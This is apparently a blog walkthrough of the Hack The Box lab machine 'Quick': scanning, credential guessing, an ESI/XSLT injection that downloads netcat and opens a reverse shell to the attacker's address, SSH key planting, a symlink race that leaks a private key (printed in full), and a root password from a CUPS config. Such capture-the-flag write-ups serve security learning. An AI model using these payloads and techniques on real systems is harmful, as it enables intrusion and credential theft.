QUICK WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 15:12 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:12
Completed NSE at 15:12, 0.00s elapsed
Initiating NSE at 15:12
Completed NSE at 15:12, 0.00s elapsed
Initiating NSE at 15:12
Completed NSE at 15:12, 0.00s elapsed
Initiating Ping Scan at 15:12
Scanning 10.10.10.186 [4 ports]
Completed Ping Scan at 15:12, 0.54s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:12
Scanning quick.htb (10.10.10.186) [1000 ports]
Discovered open port 22/tcp on 10.10.10.186
Discovered open port 9001/tcp on 10.10.10.186
Completed SYN Stealth Scan at 15:12, 3.20s elapsed (1000 total ports)
Initiating Service scan at 15:12
Scanning 2 services on quick.htb (10.10.10.186)
Completed Service scan at 15:12, 12.20s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against quick.htb (10.10.10.186)
Retrying OS detection (try #2) against quick.htb (10.10.10.186)
Retrying OS detection (try #3) against quick.htb (10.10.10.186)
Retrying OS detection (try #4) against quick.htb (10.10.10.186)
Retrying OS detection (try #5) against quick.htb (10.10.10.186)
Initiating Traceroute at 15:12
Completed Traceroute at 15:12, 0.61s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:12
Completed Parallel DNS resolution of 2 hosts. at 15:12, 0.61s elapsed
NSE: Script scanning 10.10.10.186.
Initiating NSE at 15:12
Completed NSE at 15:13, 30.88s elapsed
Initiating NSE at 15:13
Completed NSE at 15:14, 60.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Nmap scan report for quick.htb (10.10.10.186)
Host is up (0.30s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA)
|   256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA)
|_  256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519)
9001/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Quick | Broadband Services
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/24%OT=22%CT=1%CU=42891%PV=Y%DS=2%DC=T%G=Y%TM=5F1AAD7
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 6.804 days (since Fri Jul 17 19:56:43 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   607.59 ms 10.10.14.1
2   607.72 ms quick.htb (10.10.10.186)

NSE: Script Post-scanning.
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Initiating NSE at 15:14
Completed NSE at 15:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.03 seconds
           Raw packets sent: 1130 (53.928KB) | Rcvd: 1089 (48.609KB)

PORT 9001 ENUMERATION

LOGIN PAGE:

Here We have portal link which we cannot access directly So to access that we heed to use http3-client QUICHE

https://developers.cloudflare.com/http3/intro/http3-client/

So through above link we can access this link as shown below:

┌─[root@liquid]─[~/Tools/quiche/target/debug/examples]
└──╼ #RUST_LOG="info" ./http3-client https://portal.quick.htb

<html>
<title> Quick | Customer Portal</title>
<h1>Quick | Portal</h1>
<head>
<style>
ul {
  list-style-type: none;
  margin: 0;
  padding: 0;
  width: 200px;
  background-color: #f1f1f1;
}

li a {
  display: block;
  color: #000;
  padding: 8px 16px;
  text-decoration: none;
}

/* Change the link color on hover */
li a:hover {
  background-color: #555;
  color: white;
}
</style>
</head>
<body>
<p> Welcome to Quick User Portal</p>
<ul>
  <li><a href="index.php">Home</a></li>
  <li><a href="index.php?view=contact">Contact</a></li>
  <li><a href="index.php?view=about">About</a></li>
  <li><a href="index.php?view=docs">References</a></li>
</ul>
</html>

Here we have a directory named DOCS which we will be accessing now

┌─[root@liquid]─[~/Tools/quiche/target/debug/examples]
└──╼ #RUST_LOG="info" ./http3-client https://portal.quick.htb?view=docs
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">

<h1>Quick | References</h1>
<ul>
  <li><a href="docs/QuickStart.pdf">Quick-Start Guide</a></li>
  <li><a href="docs/Connectivity.pdf">Connectivity Guide</a></li>
</ul>
</head>
</html>

So Lets get this PDF :

┌─[root@liquid]─[~/Tools/quiche/target/debug/examples]
└──╼ #RUST_LOG="info" ./http3-client https://portal.quick.htb/docs/Connectivity.pdf > Connectivity.pdf

In this PDF we have password but for that we need email also to login

So we have Some names and companies in TESTIMONIALS AND CLIENTS

So we will be crating 3 wordlists as names,company,TLD(top level domain)

after that we will be using this script made by me:

#!/bin/bash

for i in $(cat clients.txt)
do
for j in $(cat company.txt)
do
for k in $(cat tld.txt)
do
echo $i@$j.$k
done
done
done

From Where we will get our emails and after fuzzing through every mail we will get our valid mail for fuzzing i tried it on BURP SUITE

Elisa@Wink.co.uk : Quick4cc3$$

After login using these credentials we will see SEARCH AND RASING TICKET OPTIONS.

So we will first send this through burp where we will see that we have ESIGATE something which after searching we will see that it can be exploited

Here in above picture we see that we have ESIGATE So to understand this we have exploit here

https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/

Here we have to create 2 files XML and XSL which we will be sending through this link

<esi:include src="http://10.10.14.90/b.xml" stylesheet="http://10.10.14.90/a.xsl">
</esi:include>

After sending it through describe part we will raise ticket which will give us ticket number through which we can trigger the ticket number in search bar.

Where B.XML will be empty and A.XSL will contain main code

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[touch /tmp/pwned]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>

Here we just have to change data in this part [CDATA[touch /tmp/pwned]]

So we will be sending request 3 times and do remember to change file name everytime both xsl and xml filename. Also we need to turn our Python server on port 80 ON so that our script could execute this payload

[CDATA[wget http://10.10.14.90/nc%5D%5D —-> nc from /usr/bin/nc

[CDATA[chmod +x nc]]

[CDATA[./nc 10.10.14.90 9002 -e /bin/bash]]

Script will look like this

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[./nc 10.10.14.90 9002 -e /bin/bash]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>


So sending data and triggering ticket will look like this :

When we trigger for third ticket we will get our shell on netcat

It Will Look like this:

┌─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.90] from (UNKNOWN) [10.10.10.186] 45588
id
uid=1000(sam) gid=1000(sam) groups=1000(sam)
pwd
/home/sam

So here I tried to get ssh keys by generating them their but what we have to do to get better access we generate SSH KEYS in our machine and copy public keys to sam’s authorized_keys after making .ssh folder.

sam@quick:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDr5QKgmZVp2ThreC4sryAUXCJMlU7BGiwvfpcUOW1P2XKFl6XTaGk437IReELcuAK+qqTimOqj0zaPJukZRmWG+AxrBVBAtQJ4625JFhnZjDhXv77O+x+Qqak2nMFT8PueiGl5AcXkIwXPFi8GvKNn8zcLu7UQuzQJsZIiynhppEePhg9hDq5dCR6fWY8j2m9WHpZy2VRKeLZWeRbHzZlF3HQgQYjQCKRz4gYp4sffifsRGVItg8DPY0zifQtuocv/hmcxA35Sa0Vo1SMDRHCQkfihwbkFnFAFo4BDX/W1ku4UmutJngi5j2bM0T4/YN8RfXu6AwcqdRj9m+Gzht9J6qCrPVhJN1T6KZxOju9ukdmhKnOOBSoUXdo4sBYTt9teTfzTkaUdo2cRqdBcEexJM7HZ6m6eRAdvb9FTgySDgQ64aD2sfTWzr1XWTEa7laAGxVr2evKbAFwbGqdp4Uxa+8Trt4xlv8wVZUzTyMlQEkEB3Xak8ifTFIL3JmGx/X0= root@liquid' > authorized_keys

GETTING USER ACCESS

We will just SSH into user SAM

┌─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #ssh -i id_rsa sam@10.10.10.186
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jul 24 15:46:22 UTC 2020

  System load:  0.0                Users logged in:                1
  Usage of /:   30.4% of 19.56GB   IP address for ens33:           10.10.10.186
  Memory usage: 17%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    135


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

54 packages can be updated.
28 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Mar 20 01:33:16 2020
sam@quick:~$ ls
esigate-distribution-5.2  nc  nc.exe  user.txt
sam@quick:~$ cat user.txt 
650182418e93bf5a83d054b4841f3616

Now Here we will see that we have mysql named file and also mysql is listening on localhost. So we may need to find its pass and user.

So Lets got for /var/www folder where we will see other interesting folders

So Here we will first getting into printers one where we have db.php which is containing password for mysql

“localhost”,”db_adm”,”db_p4ss”,”quick”

MYSQL

sam@quick:/var/www/printer$ mysql quick -u db_adm -p
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 276
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases
    -> ;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| quick              |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use quick
Database changed
mysql> show tables;
+-----------------+
| Tables_in_quick |
+-----------------+
| jobs            |
| tickets         |
| users           |
+-----------------+
3 rows in set (0.00 sec)

mysql> select * from users;
+--------------+------------------+----------------------------------+
| name         | email            | password                         |
+--------------+------------------+----------------------------------+
| Elisa        | elisa@wink.co.uk | c6c35ae1f3cb19438e0199cfa72a9d9d |
| Server Admin | srvadm@quick.htb | e626d51f8fbfd1124fdea88396c35d05 |
+--------------+------------------+----------------------------------+

Here we have hashes which after decoding from md5 then DES we will get

e626d51f8fbfd1124fdea88396c35d05 > fajxXl5T9swMM > yl51pbx

So Here we have this password but we need to use it somewhere so to that we need to get printers folder history

So here we will be using command apachectl -S which will give output as following

sam@quick:/var/www/printer$ apachectl -S
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' directive globally to suppress this message
VirtualHost configuration:
*:80                   is a NameVirtualHost
         default server 127.0.1.1 (/etc/apache2/sites-enabled/000-default.conf:1)
         port 80 namevhost 127.0.1.1 (/etc/apache2/sites-enabled/000-default.conf:1)
         port 80 namevhost printerv2.quick.htb (/etc/apache2/sites-enabled/000-default.conf:30)
ServerRoot: "/etc/apache2"
Main DocumentRoot: "/var/www/html"
Main ErrorLog: "/var/log/apache2/error.log"
Mutex default: dir="/var/run/apache2/" mechanism=default 
Mutex mpm-accept: using_defaults
Mutex watchdog-callback: using_defaults
PidFile: "/var/run/apache2/apache2.pid"
Define: DUMP_VHOSTS
Define: DUMP_RUN_CFG
User: name="www-data" id=33 not_used
Group: name="www-data" id=33 not_used

Here printerv2.quick.htb is listening on local host so we will be port forwarding this to our machine and will be enumerating it

command to port forward we will be using same ssh key with little change in command

ssh -i id_rsa -L 80:127.0.0.1:80 sam@10.10.10.186

So here we will login using the above mail and password

So here we will be checking job.php file where it is taking IP and PORT from the page which looks like this

Here we will be specifying port and ip where we will listen as in job.php it is taking file fro their and will display it on netcat IP. which can be abused by directing it to srvadm ‘s ssh key

cd /var/www/jobs;
while true;
do
        for file in $(ls .);
        do
                rm -rf $file;
                ln -s /home/srvadm/.ssh/id_rsa $file;
        done
done

Here I took help from my dscord friend

Now here it is going to delet evry file and create a new one which will be the name of file as /home/srvadm/.ssh.id_rsa

after that we will have shell as this

┌─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #nc -lnvp 9004
listening on [any] 9004 ...
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAutSlpZLFoQfbaRT7O8rP8LsjE84QJPeWQJji6MF0S/RGCd4P
AP1UWD26CAaDy4J7B2f5M/o5XEYIZeR+KKSh+mD//FOy+O3sqIX37anFqqvhJQ6D
1L2WOskWoyZzGqb8r94gN9TXW8TRlz7hMqq2jfWBgGm3YVzMKYSYsWi6dVYTlVGY
DLNb/88agUQGR8cANRis/2ckWK+GiyTo5pgZacnSN/61p1Ctv0IC/zCOI5p9CKnd
whOvbmjzNvh/b0eXbYQ/Rp5ryLuSJLZ1aPrtK+LCnqjKK0hwH8gKkdZk/d3Ofq4i
hRiQlakwPlsHy2am1O+smg0214HMyQQdn7lE9QIDAQABAoIBAG2zSKQkvxgjdeiI
ok/kcR5ns1wApagfHEFHxAxo8vFaN/m5QlQRa4H4lI/7y00mizi5CzFC3oVYtbum
Y5FXwagzZntxZegWQ9xb9Uy+X8sr6yIIGM5El75iroETpYhjvoFBSuedeOpwcaR+
DlritBg8rFKLQFrR0ysZqVKaLMmRxPutqvhd1vOZDO4R/8ZMKggFnPC03AkgXkp3
j8+ktSPW6THykwGnHXY/vkMAS2H3dBhmecA/Ks6V8h5htvybhDLuUMd++K6Fqo/B
H14kq+y0Vfjs37vcNR5G7E+7hNw3zv5N8uchP23TZn2MynsujZ3TwbwOV5pw/CxO
9nb7BSECgYEA5hMD4QRo35OwM/LCu5XCJjGardhHn83OIPUEmVePJ1SGCam6oxvc
bAA5n83ERMXpDmE4I7y3CNrd9DS/uUae9q4CN/5gjEcc9Z1E81U64v7+H8VK3rue
F6PinFsdov50tWJbxSYr0dIktSuUUPZrR+in5SOzP77kxZL4QtRE710CgYEAz+It
T/TMzWbl+9uLAyanQObr5gD1UmG5fdYcutTB+8JOXGKFDIyY+oVMwoU1jzk7KUtw
8MzyuG8D1icVysRXHU8btn5t1l51RXu0HsBmJ9LaySWFRbNt9bc7FErajJr8Dakj
b4gu9IKHcGchN2akH3KZ6lz/ayIAxFtadrTMinkCgYEAxpZzKq6btx/LX4uS+kdx
pXX7hULBz/XcjiXvKkyhi9kxOPX/2voZcD9hfcYmOxZ466iOxIoHkuUX38oIEuwa
GeJol9xBidN386kj8sUGZxiiUNoCne5jrxQObddX5XCtXELh43HnMNyqQpazFo8c
Wp0/DlGaTtN+s+r/zu9Z8SECgYEAtfvuZvyK/ZWC6AS9oTiJWovNH0DfggsC82Ip
LHVsjBUBvGaSyvWaRlXDaNZsmMElRXVBncwM/+BPn33/2c4f5QyH2i67wNpYF0e/
2tvbkilIVqZ+ERKOxHhvQ8hzontbBCp5Vv4E/Q/3uTLPJUy5iL4ud7iJ8SOHQF4o
x5pnJSECgYEA4gk6oVOHMVtxrXh3ASZyQIn6VKO+cIXHj72RAsFAD/98intvVsA3
+DvKZu+NeroPtaI7NZv6muiaK7ZZgGcp4zEHRwxM+xQvxJpd3YzaKWZbCIPDDT/u
NJx1AkN7Gr9v4WjccrSk1hitPE1w6cmBNStwaQWD+KUUEeWYUAx20RA=
-----END RSA PRIVATE KEY-----

Here we go with our SSH keys

GETTING 2ND USER ACCESS

Lets SSH into the user srvadm

┌─[✗]─[root@liquid]─[~/Desktop/HTB/quickC]
└──╼ #ssh -i id_rsaadmin srvadm@10.10.10.186
load pubkey "id_rsaadmin": invalid format
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jul 24 18:07:20 UTC 2020

  System load:  0.0                Users logged in:                1
  Usage of /:   30.4% of 19.56GB   IP address for ens33:           10.10.10.186
  Memory usage: 18%                IP address for br-9ef1bb2e82cd: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    138


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

54 packages can be updated.
28 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Jul 24 16:29:03 2020 from 10.10.14.90
srvadm@quick:~$ id
uid=1001(srvadm) gid=1001(srvadm) groups=1001(srvadm),999(printers)
srvadm@quick:~$ 

Here we go With our 2nd user access

GETTING ROOT ACCESS

Here we dont have password for this user

So we will just be checking files and folders in this directory

From where we will get password for root

srvadm@quick:~$ id
uid=1001(srvadm) gid=1001(srvadm) groups=1001(srvadm),999(printers)
srvadm@quick:~$ ls -la
total 36
drwxr-xr-x 6 srvadm srvadm 4096 Mar 20 06:37 .
drwxr-xr-x 4 root   root   4096 Mar 20 02:16 ..
lrwxrwxrwx 1 srvadm srvadm    9 Mar 20 02:38 .bash_history -> /dev/null
-rw-r--r-- 1 srvadm srvadm  220 Mar 20 02:16 .bash_logout
-rw-r--r-- 1 srvadm srvadm 3771 Mar 20 02:16 .bashrc
drwx------ 5 srvadm srvadm 4096 Mar 20 06:20 .cache
drwx------ 3 srvadm srvadm 4096 Mar 20 02:38 .gnupg
drwxrwxr-x 3 srvadm srvadm 4096 Mar 20 06:37 .local
-rw-r--r-- 1 srvadm srvadm  807 Mar 20 02:16 .profile
drwx------ 2 srvadm srvadm 4096 Mar 20 02:38 .ssh
srvadm@quick:~$ cd .cache/
srvadm@quick:~/.cache$ ls
conf.d  logs  motd.legal-displayed  packages
srvadm@quick:~/.cache$ cd conf.d/
srvadm@quick:~/.cache/conf.d$ ls
cupsd.conf  printers.conf
srvadm@quick:~/.cache/conf.d$ cat printers.conf 
# Printer configuration file for CUPS v2.3.0
# Written by cupsd on 2020-02-18 17:11
# DO NOT EDIT THIS FILE WHEN CUPSD IS RUNNING
NextPrinterId 5

<------>


MakeModel KONICA MINOLTA C554SeriesPS(P)
DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer
State Idle


<------>

Here we have a string which looks URL encoded SO after decoding it we will get some password

%26ftQ4K3SGde8%3F >> &ftQ4K3SGde8?

LETS SU TO ROOT AND GET ROOT FLAG!

srvadm@quick:~/.cache/conf.d$ su root
Password: 
root@quick:/home/srvadm/.cache/conf.d# cd
root@quick:~# pwd
/root
root@quick:~# id
uid=0(root) gid=0(root) groups=0(root)
root@quick:~# cat root.txt
6c11493e99685f709a1fc2ff03a4404a
root@quick:~# 

Here we go with our root flag!!

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: